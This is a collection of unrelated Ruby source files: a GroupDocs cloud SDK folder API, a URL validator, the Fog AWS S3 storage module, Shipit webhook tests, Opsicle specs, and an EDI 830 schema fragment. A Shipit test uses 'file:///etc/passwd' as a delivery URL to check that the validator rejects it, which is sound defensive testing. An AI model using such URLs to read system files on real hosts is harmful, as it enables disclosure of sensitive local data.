# @return [nil]
def move_folder(request)
move_folder_with_http_info(request)
nil
end
# Move folder
#
# @param request move_folder_request
# @return [Array<(nil, Fixnum, Hash)>]
# nil, response status code and response headers
def move_folder_with_http_info(request)
raise ArgumentError, 'Incorrect request type' unless request.is_a? MoveFolderRequest
@api_client.config.logger.debug 'Calling API: FolderApi.move_folder ...' if @api_client.config.debugging
# verify the required parameter 'src_path' is set
raise ArgumentError, 'Missing the required parameter src_path when calling FolderApi.move_folder' if @api_client.config.client_side_validation && request.src_path.nil?
# verify the required parameter 'dest_path' is set
raise ArgumentError, 'Missing the required parameter dest_path when calling FolderApi.move_folder' if @api_client.config.client_side_validation && request.dest_path.nil?
# resource path
local_var_path = '/annotation/storage/folder/move/{srcPath}'
local_var_path = local_var_path.sub('{' + downcase_first_letter('srcPath') + '}', request.src_path.to_s)
# query parameters
query_params = {}
query_params[downcase_first_letter('destPath')] = request.dest_path
if local_var_path.include? ('{' + downcase_first_letter('srcStorageName') + '}')
local_var_path = local_var_path.sub('{' + downcase_first_letter('srcStorageName') + '}', request.src_storage_name.to_s)
else
query_params[downcase_first_letter('srcStorageName')] = request.src_storage_name unless request.src_storage_name.nil?
end
if local_var_path.include? ('{' + downcase_first_letter('destStorageName') + '}')
local_var_path = local_var_path.sub('{' + downcase_first_letter('destStorageName') + '}', request.dest_storage_name.to_s)
else
query_params[downcase_first_letter('destStorageName')] = request.dest_storage_name unless request.dest_storage_name.nil?
end
# header parameters
header_params = {}
# HTTP header 'Accept' (if needed)
header_params['Accept'] = @api_client.select_header_accept(['application/json'])
# HTTP header 'Content-Type'
header_params['Content-Type'] = @api_client.select_header_content_type(['application/json'])
# form parameters
form_params = {}
# http body (model)
post_body = nil
data, status_code, headers = @api_client.call_api(:PUT, local_var_path,
header_params: header_params,
query_params: query_params,
form_params: form_params,
body: post_body,
access_token: get_access_token)
if @api_client.config.debugging
@api_client.config.logger.debug "API called:
FolderApi#move_folder\nData: #{data.inspect}\nStatus code: #{status_code}\nHeaders: #{headers}"
end
[data, status_code, headers]
end
#
# Helper method to convert first letter to downcase
#
private def downcase_first_letter(str)
value = str[0].downcase + str[1..-1]
value
end
#
# Retrieves access token
#
private def get_access_token
if @access_token.nil? then
request_access_token
end
@access_token
end
#
# Gets a access token from server
#
private def request_access_token
auth_config = Configuration.new(@config.app_sid, @config.app_key)
auth_config.api_base_url = @config.api_base_url
auth_config.debugging = @config.debugging
auth_config.logger = @config.logger
auth_config.temp_folder_path = @config.temp_folder_path
auth_config.client_side_validation = @config.client_side_validation
auth_config.api_version = ''
auth_api_client = ApiClient.new(auth_config)
request_url = "/connect/token"
post_data = "grant_type=client_credentials&client_id=#{@config.app_sid}&client_secret=#{@config.app_key}"
data, _status_code, _header = auth_api_client.call_api(:POST, request_url, :body => post_data, :return_type => 'Object')
@access_token = data[:access_token]
expires_in_seconds = data[:expires_in].to_i - 5 * 60
expires_in_days = Rational(expires_in_seconds, 60 * 60 * 24)
@access_token_expires_at = DateTime.now + expires_in_days
end
# requires all files inside a directory from current dir
# @param _dir can be relative path like '/lib' or "../lib"
private def require_all(_dir)
Dir[File.expand_path(File.join(File.dirname(File.absolute_path(__FILE__)), _dir)) + "/*.rb"].each do |file|
require file
end
end
end
end
#
# --------------------------------------------------------------------------------------------------------------------
# <copyright company="Aspose Pty Ltd" file="copy_folder_request.rb">
# Copyright (c) 2003-2021 Aspose Pty Ltd
# </copyright>
# <summary>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# </summary>
# --------------------------------------------------------------------------------------------------------------------
#
module GroupDocsAnnotationCloud
#
# Request model for copy_folder operation.
#
class CopyFolderRequest
# Source folder path e.g. '/src'
attr_accessor :src_path
# Destination folder path e.g. '/dst'
attr_accessor :dest_path
# Source storage name
attr_accessor :src_storage_name
# Destination storage name
attr_accessor :dest_storage_name
#
# Initializes a new instance.
# @param src_path Source folder path e.g. '/src'
# @param dest_path Destination folder path e.g. '/dst'
# @param src_storage_name Source storage name
# @param dest_storage_name Destination storage name
def initialize(src_path, dest_path, src_storage_name = nil, dest_storage_name = nil)
self.src_path = src_path
self.dest_path = dest_path
self.src_storage_name = src_storage_name
self.dest_storage_name = dest_storage_name
end
end
end
#
# --------------------------------------------------------------------------------------------------------------------
# <copyright company="Aspose Pty Ltd" file="create_folder_request.rb">
# Copyright (c) 2003-2021 Aspose Pty Ltd
# </copyright>
# <summary>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# </summary>
# --------------------------------------------------------------------------------------------------------------------
#
module GroupDocsAnnotationCloud
#
# Request model for create_folder operation.
#
class CreateFolderRequest
# Folder path to create e.g. 'folder_1/folder_2/'
attr_accessor :path
# Storage name
attr_accessor :storage_name
#
# Initializes a new instance.
# @param path Folder path to create e.g. 'folder_1/folder_2/'
# @param storage_name Storage name
def initialize(path, storage_name = nil)
self.path = path
self.storage_name = storage_name
end
end
end
#
# --------------------------------------------------------------------------------------------------------------------
# <copyright company="Aspose Pty Ltd" file="delete_folder_request.rb">
# Copyright (c) 2003-2021 Aspose Pty Ltd
# </copyright>
# <summary>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# </summary>
# --------------------------------------------------------------------------------------------------------------------
#
module GroupDocsAnnotationCloud
#
# Request model for delete_folder operation.
#
class DeleteFolderRequest
# Folder path e.g. '/folder'
attr_accessor :path
# Storage name
attr_accessor :storage_name
# Enable to delete folders, subfolders and files
attr_accessor :recursive
#
# Initializes a new instance.
# @param path Folder path e.g. '/folder'
# @param storage_name Storage name
# @param recursive Enable to delete folders, subfolders and files
def initialize(path, storage_name = nil, recursive = nil)
self.path = path
self.storage_name = storage_name
self.recursive = recursive
end
end
end
#
# --------------------------------------------------------------------------------------------------------------------
# <copyright company="Aspose Pty Ltd" file="get_files_list_request.rb">
# Copyright (c) 2003-2021 Aspose Pty Ltd
# </copyright>
# <summary>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# </summary>
# --------------------------------------------------------------------------------------------------------------------
#
module GroupDocsAnnotationCloud
#
# Request model for get_files_list operation.
#
class GetFilesListRequest
# Folder path e.g. '/folder'
attr_accessor :path
# Storage name
attr_accessor :storage_name
#
# Initializes a new instance.
# @param path Folder path e.g. '/folder'
# @param storage_name Storage name
def initialize(path, storage_name = nil)
self.path = path
self.storage_name = storage_name
end
end
end
#
# --------------------------------------------------------------------------------------------------------------------
# <copyright company="Aspose Pty Ltd" file="move_folder_request.rb">
# Copyright (c) 2003-2021 Aspose Pty Ltd
# </copyright>
# <summary>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# </summary>
# --------------------------------------------------------------------------------------------------------------------
#
module GroupDocsAnnotationCloud
#
# Request model for move_folder operation.
#
class MoveFolderRequest
# Folder path to move e.g. '/folder'
attr_accessor :src_path
# Destination folder path to move to e.g '/dst'
attr_accessor :dest_path
# Source storage name
attr_accessor :src_storage_name
# Destination storage name
attr_accessor :dest_storage_name
#
# Initializes a new instance.
# @param src_path Folder path to move e.g. '/folder'
# @param dest_path Destination folder path to move to e.g '/dst'
# @param src_storage_name Source storage name
# @param dest_storage_name Destination storage name
def initialize(src_path, dest_path, src_storage_name = nil, dest_storage_name = nil)
self.src_path = src_path
self.dest_path = dest_path
self.src_storage_name = src_storage_name
self.dest_storage_name = dest_storage_name
end
end
end
| 43.493525 | 175 | 0.636959 |
ed23b01fe636f653db04772f3c68fd11d108fd7a | 1,348 | require_relative 'base'
module Semi::Variables
class Url < Semi::Variables::Base
@@url_re = Regexp.new('^(?<proto>https?|ftp):\/{2}(?!\/)(?<host>[a-z\.0-9\-_]+)?(?::(?<port>\d{1,5}))?\/?(?<path>.*?)\/?(?<file>[^\/\?]+)?(?:\?(?<params>.*?))?$', Regexp::IGNORECASE)
def initialize(val)
if @@url_re.match(val)
@value = val
else
raise Semi::VariableError, '#{val} does not look like a URL'
end
end
def validate
self.validate(@value)
end
def self.validate(val)
if ['String', 'Semi::Variables::Url'].include? val.class.to_s
if @@url_re.match(val.to_s)
return true
end
end
false
end
def proto
match = @@url_re.match(@value)
if match
match['proto']
end
end
def host
match = @@url_re.match(@value)
if match
match['host']
end
end
def port
match = @@url_re.match(@value)
if match
match['port']
end
end
def path
match = @@url_re.match(@value)
if match
match['path']
end
end
def file
match = @@url_re.match(@value)
if match
match['file']
end
end
def params
match = @@url_re.match(@value)
if match
match['params']
end
end
end
end
| 18.465753 | 186 | 0.505193 |
0307ccdaa317a2ed353f533e885b4471d932b32e | 14,568 | require 'fog/aws'
require 'fog/storage'
module Fog
module Storage
class AWS < Fog::Service
extend Fog::AWS::CredentialFetcher::ServiceMethods
requires :aws_access_key_id, :aws_secret_access_key
recognizes :endpoint, :region, :host, :path, :port, :scheme, :persistent, :use_iam_profile, :aws_session_token, :aws_credentials_expire_at
secrets :aws_secret_access_key, :hmac
model_path 'fog/aws/models/storage'
collection :directories
model :directory
collection :files
model :file
request_path 'fog/aws/requests/storage'
request :abort_multipart_upload
request :complete_multipart_upload
request :copy_object
request :delete_bucket
request :delete_bucket_cors
request :delete_bucket_lifecycle
request :delete_bucket_policy
request :delete_bucket_website
request :delete_object
request :delete_multiple_objects
request :get_bucket
request :get_bucket_acl
request :get_bucket_cors
request :get_bucket_lifecycle
request :get_bucket_location
request :get_bucket_logging
request :get_bucket_object_versions
request :get_bucket_policy
request :get_bucket_versioning
request :get_bucket_website
request :get_object
request :get_object_acl
request :get_object_torrent
request :get_object_http_url
request :get_object_https_url
request :get_object_url
request :get_request_payment
request :get_service
request :head_object
request :initiate_multipart_upload
request :list_multipart_uploads
request :list_parts
request :post_object_hidden_fields
request :put_bucket
request :put_bucket_acl
request :put_bucket_cors
request :put_bucket_lifecycle
request :put_bucket_logging
request :put_bucket_policy
request :put_bucket_versioning
request :put_bucket_website
request :put_object
request :put_object_acl
request :put_object_url
request :put_request_payment
request :sync_clock
request :upload_part
module Utils
attr_accessor :region
def cdn
@cdn ||= Fog::AWS::CDN.new(
:aws_access_key_id => @aws_access_key_id,
:aws_secret_access_key => @aws_secret_access_key,
:use_iam_profile => @use_iam_profile
)
end
def http_url(params, expires)
scheme_host_path_query(params.merge(:scheme => 'http', :port => 80), expires)
end
def https_url(params, expires)
scheme_host_path_query(params.merge(:scheme => 'https', :port => 443), expires)
end
def url(params, expires)
Fog::Logger.deprecation("Fog::Storage::AWS => #url is deprecated, use #https_url instead [light_black](#{caller.first})[/]")
https_url(params, expires)
end
private
def scheme_host_path_query(params, expires)
params[:scheme] ||= @scheme
if params[:port] == 80 && params[:scheme] == 'http'
params.delete(:port)
end
if params[:port] == 443 && params[:scheme] == 'https'
params.delete(:port)
end
params[:headers] ||= {}
params[:headers]['Date'] = expires.to_i
params[:path] = Fog::AWS.escape(params[:path]).gsub('%2F', '/')
query = []
params[:headers]['x-amz-security-token'] = @aws_session_token if @aws_session_token
if params[:query]
for key, value in params[:query]
query << "#{key}=#{Fog::AWS.escape(value)}"
end
end
query << "AWSAccessKeyId=#{@aws_access_key_id}"
query << "Signature=#{Fog::AWS.escape(signature(params))}"
query << "Expires=#{params[:headers]['Date']}"
query << "x-amz-security-token=#{Fog::AWS.escape(@aws_session_token)}" if @aws_session_token
port_part = params[:port] && ":#{params[:port]}"
"#{params[:scheme]}://#{params[:host]}#{port_part}/#{params[:path]}?#{query.join('&')}"
end
end
class Mock
include Utils
def self.acls(type)
case type
when 'private'
{
"AccessControlList" => [
{
"Permission" => "FULL_CONTROL",
"Grantee" => {"DisplayName" => "me", "ID" => "2744ccd10c7533bd736ad890f9dd5cab2adb27b07d500b9493f29cdc420cb2e0"}
}
],
"Owner" => {"DisplayName" => "me", "ID" => "2744ccd10c7533bd736ad890f9dd5cab2adb27b07d500b9493f29cdc420cb2e0"}
}
when 'public-read'
{
"AccessControlList" => [
{
"Permission" => "FULL_CONTROL",
"Grantee" => {"DisplayName" => "me", "ID" => "2744ccd10c7533bd736ad890f9dd5cab2adb27b07d500b9493f29cdc420cb2e0"}
},
{
"Permission" => "READ",
"Grantee" => {"URI" => "http://acs.amazonaws.com/groups/global/AllUsers"}
}
],
"Owner" => {"DisplayName" => "me", "ID" => "2744ccd10c7533bd736ad890f9dd5cab2adb27b07d500b9493f29cdc420cb2e0"}
}
when 'public-read-write'
{
"AccessControlList" => [
{
"Permission" => "FULL_CONTROL",
"Grantee" => {"DisplayName" => "me", "ID" => "2744ccd10c7533bd736ad890f9dd5cab2adb27b07d500b9493f29cdc420cb2e0"}
},
{
"Permission" => "READ",
"Grantee" => {"URI" => "http://acs.amazonaws.com/groups/global/AllUsers"}
},
{
"Permission" => "WRITE",
"Grantee" => {"URI" => "http://acs.amazonaws.com/groups/global/AllUsers"}
}
],
"Owner" => {"DisplayName" => "me", "ID" => "2744ccd10c7533bd736ad890f9dd5cab2adb27b07d500b9493f29cdc420cb2e0"}
}
when 'authenticated-read'
{
"AccessControlList" => [
{
"Permission" => "FULL_CONTROL",
"Grantee" => {"DisplayName" => "me", "ID" => "2744ccd10c7533bd736ad890f9dd5cab2adb27b07d500b9493f29cdc420cb2e0"}
},
{
"Permission" => "READ",
"Grantee" => {"URI" => "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"}
}
],
"Owner" => {"DisplayName" => "me", "ID" => "2744ccd10c7533bd736ad890f9dd5cab2adb27b07d500b9493f29cdc420cb2e0"}
}
end
end
def self.data
@data ||= Hash.new do |hash, region|
hash[region] = Hash.new do |region_hash, key|
region_hash[key] = {
:acls => {
:bucket => {},
:object => {}
},
:buckets => {},
:cors => {
:bucket => {}
}
}
end
end
end
def self.reset
@data = nil
end
def initialize(options={})
require 'mime/types'
@use_iam_profile = options[:use_iam_profile]
setup_credentials(options)
options[:region] ||= 'us-east-1'
@host = options[:host] || case options[:region]
when 'us-east-1'
's3.amazonaws.com'
else
"s3-#{options[:region]}.amazonaws.com"
end
@scheme = options[:scheme] || 'https'
@region = options[:region]
end
def data
self.class.data[@region][@aws_access_key_id]
end
def reset_data
self.class.data[@region].delete(@aws_access_key_id)
end
def signature(params)
"foo"
end
def setup_credentials(options)
@aws_access_key_id = options[:aws_access_key_id]
@aws_secret_access_key = options[:aws_secret_access_key]
@aws_session_token = options[:aws_session_token]
@aws_credentials_expire_at = options[:aws_credentials_expire_at]
end
end
class Real
include Utils
include Fog::AWS::CredentialFetcher::ConnectionMethods
# Initialize connection to S3
#
# ==== Notes
# options parameter must include values for :aws_access_key_id and
# :aws_secret_access_key in order to create a connection
#
# ==== Examples
# s3 = Fog::Storage.new(
# :provider => "AWS",
# :aws_access_key_id => your_aws_access_key_id,
# :aws_secret_access_key => your_aws_secret_access_key
# )
#
# ==== Parameters
# * options<~Hash> - config arguments for connection. Defaults to {}.
#
# ==== Returns
# * S3 object with connection to aws.
def initialize(options={})
require 'fog/core/parser'
require 'mime/types'
@use_iam_profile = options[:use_iam_profile]
setup_credentials(options)
@connection_options = options[:connection_options] || {}
if @endpoint = options[:endpoint]
endpoint = URI.parse(@endpoint)
@host = endpoint.host
@path = if endpoint.path.empty?
'/'
else
endpoint.path
end
@port = endpoint.port
@scheme = endpoint.scheme
else
options[:region] ||= 'us-east-1'
@region = options[:region]
@host = options[:host] || case options[:region]
when 'us-east-1'
's3.amazonaws.com'
else
"s3-#{options[:region]}.amazonaws.com"
end
@path = options[:path] || '/'
@persistent = options.fetch(:persistent, false)
@port = options[:port] || 443
@scheme = options[:scheme] || 'https'
end
@connection = Fog::Connection.new("#{@scheme}://#{@host}:#{@port}#{@path}", @persistent, @connection_options)
end
def reload
@connection.reset
end
def signature(params)
string_to_sign =
<<-DATA
#{params[:method].to_s.upcase}
#{params[:headers]['Content-MD5']}
#{params[:headers]['Content-Type']}
#{params[:headers]['Date']}
DATA
amz_headers, canonical_amz_headers = {}, ''
for key, value in params[:headers]
if key[0..5] == 'x-amz-'
amz_headers[key] = value
end
end
amz_headers = amz_headers.sort {|x, y| x[0] <=> y[0]}
for key, value in amz_headers
canonical_amz_headers << "#{key}:#{value}\n"
end
string_to_sign << canonical_amz_headers
subdomain = params[:host].split(".#{@host}").first
unless subdomain =~ /^(?:[a-z]|\d(?!\d{0,2}(?:\.\d{1,3}){3}$))(?:[a-z0-9]|\.(?![\.\-])|\-(?![\.])){1,61}[a-z0-9]$/
Fog::Logger.warning("fog: the specified s3 bucket name(#{subdomain}) is not a valid dns name, which will negatively impact performance. For details see: http://docs.amazonwebservices.com/AmazonS3/latest/dev/BucketRestrictions.html")
params[:host] = params[:host].split("#{subdomain}.")[-1]
if params[:path]
params[:path] = "#{subdomain}/#{params[:path]}"
else
params[:path] = subdomain
end
subdomain = nil
end
canonical_resource = @path.dup
unless subdomain.nil? || subdomain == @host
canonical_resource << "#{Fog::AWS.escape(subdomain).downcase}/"
end
canonical_resource << params[:path].to_s
canonical_resource << '?'
for key in (params[:query] || {}).keys.sort
if %w{
acl
cors
delete
lifecycle
location
logging
notification
partNumber
policy
requestPayment
response-cache-control
response-content-disposition
response-content-encoding
response-content-language
response-content-type
response-expires
torrent
uploadId
uploads
versionId
versioning
versions
website
}.include?(key)
canonical_resource << "#{key}#{"=#{params[:query][key]}" unless params[:query][key].nil?}&"
end
end
canonical_resource.chop!
string_to_sign << canonical_resource
signed_string = @hmac.sign(string_to_sign)
Base64.encode64(signed_string).chomp!
end
private
def setup_credentials(options)
@aws_access_key_id = options[:aws_access_key_id]
@aws_secret_access_key = options[:aws_secret_access_key]
@aws_session_token = options[:aws_session_token]
@aws_credentials_expire_at = options[:aws_credentials_expire_at]
@hmac = Fog::HMAC.new('sha1', @aws_secret_access_key)
end
def request(params, &block)
refresh_credentials_if_expired
params[:headers]['Date'] = Fog::Time.now.to_date_header
params[:headers]['x-amz-security-token'] = @aws_session_token if @aws_session_token
params[:headers]['Authorization'] = "AWS #{@aws_access_key_id}:#{signature(params)}"
# FIXME: ToHashParser should make this not needed
original_params = params.dup
begin
response = @connection.request(params, &block)
rescue Excon::Errors::TemporaryRedirect => error
uri = URI.parse(error.response.is_a?(Hash) ? error.response[:headers]['Location'] : error.response.headers['Location'])
Fog::Logger.warning("fog: followed redirect to #{uri.host}, connecting to the matching region will be more performant")
response = Fog::Connection.new("#{@scheme}://#{uri.host}:#{@port}", false, @connection_options).request(original_params, &block)
end
response
end
end
end
end
end
| 35.188406 | 245 | 0.545511 |
bb3851313949605be11ac7a2fab566b7a7f7f2f9 | 3,540 | # frozen_string_literal: true
require 'test_helper'
module Shipit
class HookTest < ActiveSupport::TestCase
setup do
@stack = shipit_stacks(:shipit)
@hook = shipit_hooks(:shipit_deploys)
end
test "#url must be valid" do
@hook.delivery_url = 'file:/ad"fa/adfa'
refute @hook.valid?
assert_equal ['Delivery url is not a valid URL'], @hook.errors.full_messages
end
test "#url must not be localhost" do
@hook.delivery_url = 'file:///etc/passwd'
refute @hook.valid?
assert_equal ['Delivery url is not a valid URL'], @hook.errors.full_messages
end
test "#events is accessible as an array" do
assert_equal %w(deploy rollback), @hook.events
end
test "#events can only contain a defined set of values" do
@hook.events = %w(foo)
refute @hook.valid?
assert_equal ["Events is not a strict subset of #{Hook::EVENTS.inspect}"], @hook.errors.full_messages
end
test ".deliver schedules a delivery for each matching hook" do
assert_enqueued_jobs(2, only: DeliverHookJob) do
Hook.deliver(:deploy, @stack, 'foo' => 42)
end
end
test ".deliver! sends request with correct method, headers, and body" do
stub_request(:post, @hook.delivery_url).to_return(body: 'OK')
body = { 'foo' => 42 }
expected_body = JSON.pretty_generate(body)
expected_signature = Hook::DeliverySigner.new(@hook.secret).sign(expected_body)
perform_enqueued_jobs(only: DeliverHookJob) do
@hook.deliver!(:deploy, body)
end
assert_performed_jobs 1
assert_requested :post, @hook.delivery_url do |req|
req.headers['X-Shipit-Signature'] == expected_signature
end
end
test ".deliver! sends without signature if no secret is configured" do
stub_request(:post, @hook.delivery_url).to_return(body: 'OK')
@hook.update!(secret: '')
body = { 'foo' => 42 }
perform_enqueued_jobs(only: DeliverHookJob) do
@hook.deliver!(:deploy, body)
end
assert_performed_jobs 1
assert_requested :post, @hook.delivery_url do |req|
!req.headers.key?('X-Shipit-Signature')
end
end
test ".scoped? returns true if the hook has a stack_id" do
@hook.stack_id = nil
refute @hook.scoped?
@hook.stack_id = 42
assert @hook.scoped?
end
test ".emit schedules an EmitEventJob" do
assert_enqueued_jobs(1, only: EmitEventJob) do
Hook.emit(:deploy, @stack, 'foo' => 42)
end
end
test ".emit calls #deliver on internal hooks" do
original_receivers = Shipit.internal_hook_receivers
FakeReceiver = Module.new
FakeReceiver.expects(:deliver).with(:deploy, @stack, 'foo' => 42)
Shipit.internal_hook_receivers << FakeReceiver
Hook.emit(:deploy, @stack, 'foo' => 42)
ensure
Shipit.internal_hook_receivers = original_receivers
end
test ".emit calls no internal hooks if there are no internal_hook_receivers" do
original_receivers = Shipit.internal_hook_receivers
Shipit.internal_hook_receivers = nil
Hook.emit(:deploy, @stack, 'foo' => 42)
ensure
Shipit.internal_hook_receivers = original_receivers
end
test ".coerce_payload coerces anonymous user correctly" do
locked_stack = Stack.first
locked_stack.lock("Some Reason", nil)
serialized = Hook.coerce_payload(stack: locked_stack)
assert_json_document(serialized, "stack.lock_author.anonymous", true)
end
end
end
| 32.477064 | 107 | 0.668644 |
62f7199e40e2c691d328d5c30425ec1706ca96b1 | 2,517 | require "spec_helper"
require "opsicle"
module Opsicle
describe Update do
subject { Update.new("env", "type") }
let(:client) { double }
let(:env) { "env" }
let(:type) { "type" }
let(:values) { { :foo => "bar" } }
before do
allow(Client).to receive(:new).with('env') { client }
allow(client).to receive_message_chain("config.opsworks_config.[]") { 123 }
end
context "#execute" do
it "should update and print results" do
allow(subject).to receive(:describe) { "tacos" }
expect(subject).to receive(:print).with("tacos", "tacos")
api_opts = values.merge(:type_id => 123)
expect(client).to receive(:api_call).with("update_type", api_opts)
subject.execute(values, api_opts)
end
end
context "#describe" do
it "should return data for type" do
expect(client).to receive(:api_call).with("describe_types", :type_ids => [123]).and_return(:types => [])
subject.describe
end
end
context "#update" do
it "should update values for type" do
api_opts = values.merge(:type_id => 123)
expect(client).to receive(:api_call).with("update_type", api_opts)
subject.update(values)
end
end
context "#print" do
it "should print no changes without table" do
allow(Hashdiff).to receive(:diff) { [] }
expect(Output).to receive(:say).with("Changes: 0") { nil }
expect(Output).to_not receive(:terminal)
subject.print(nil, nil)
end
it "should print changes with table" do
allow(Hashdiff).to receive(:diff) { [%w[- nyan 1], %w[+ cat 2],%w[~ taco 3 4]] }
expect(Output).to receive(:say).with("Changes: 3") { nil }
allow(Output).to receive_message_chain("terminal.say")
allow(Output).to receive_message_chain("terminal.color")
subject.print(nil, nil)
end
end
context "#format_diff" do
let(:diff) { [%w[- nyan 1], %w[+ cat 2],%w[~ taco 3 4]] }
let(:formatted_diff) {
[%w[r- rnyan r1 r], %w[a+ acat a a2], %w[m~ mtaco m3 m4]]
}
it "should align columns and colorize" do
allow(Output).to receive(:format).with(anything, :removal) { |arg| "r#{arg}"}
allow(Output).to receive(:format).with(anything, :addition) { |arg| "a#{arg}"}
allow(Output).to receive(:format).with(anything, :modification) { |arg| "m#{arg}"}
expect(subject.format_diff(diff)).to eq(formatted_diff)
end
end
end
end
| 34.479452 | 112 | 0.599126 |
7a5e70db6380fc3fc083887f1c0dc2c77fb233c6 | 67 | module RuboCop
module Aha
VERSION = '0.8.1'.freeze
end
end
| 11.166667 | 28 | 0.656716 |
4ae0224ff7ae66f420260bcdc7d82dfd5dd749bd | 8,328 | # frozen_string_literal: true
module Stupidedi
module TransactionSets
module FortyTen
module Implementations
b = Builder
d = Schema
r = SegmentReqs
e = ElementReqs
s = SegmentDefs
PS830 = b.build("PS", "830", "",
d::TableDef.header("Header",
b::Segment(10, s:: ST, "Transaction Set Header #1", r::Required, d::RepeatCount.bounded(1),
b::Element(e::Required, "Transaction Set Identifier Code", b::Values("830")),
b::Element(e::Required, "Transaction Set Control Number")),
b::Segment(20, s::BFR, "Beginning Segment for Planning Schedule #1", r::Required, d::RepeatCount.bounded(1),
b::Element(e::Required, "Transaction Set Purpose Code", b::Values("00")),
b::Element(e::Situational, "Reference Identification"),
b::Element(e::Situational, "Release Number"),
b::Element(e::Required, "Schedule Type Qualifier", b::Values("SH")),
b::Element(e::Required, "Schedule Quantity Qualifier", b::Values("A")),
b::Element(e::Required, "Date"),
b::Element(e::Situational, "Date"),
b::Element(e::Required, "Date"),
b::Element(e::NotUsed, ""),
b::Element(e::Situational, "Purchase Order Number")),
b::Segment(50, s::REF, "Reference Identification #1", r::Situational, d::RepeatCount.bounded(12),
b::Element(e::Required, "Reference Identification Qualifier", b::Values("ZZ")),
b::Element(e::Situational, "Reference Identification"),
b::Element(e::Situational, "Description")),
d::LoopDef.build("N1 #1", d::RepeatCount.bounded(2),
b::Segment(230, s:: N1, "Name - Header", r::Situational, d::RepeatCount.bounded(1),
b::Element(e::Required, "Entity Identifier Code", b::Values("BT", "EV")),
b::Element(e::Situational, "Name"),
b::Element(e::Situational, "Identification Code Qualifier", b::Values("01","ZZ")),
b::Element(e::Situational, "Identification Code"),
